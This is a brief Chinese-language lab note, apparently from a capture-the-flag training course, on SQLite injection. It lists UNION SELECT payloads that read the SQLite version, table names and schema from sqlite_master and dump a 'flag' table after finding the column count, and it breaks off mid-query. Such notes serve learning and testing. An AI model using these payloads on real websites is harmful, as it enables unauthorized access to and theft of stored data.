东塔学院 SQLlite注入偏
sqlite_version()查看数据库版本
select group_concat(tbl_name) from sqlite_master where type=‘table’ 查表名
select sql from sqlite_master where type=‘table’ and sql not null and name not like ‘sqlite_%’ 查当前表的字段
union select flag from flag 爆制定字段数据
判断注入方式,是整型注入,然后一下判断字段数
判断字段数,当字段书为5时,页面显示正常,
当字数为6,页面没显示
查看到当前数据库版本
union select 1,sqlite_version(),3,4,5
查看当前表名
union select 1,group_concat(tbl_name),3,4,5 from sqlite_master where t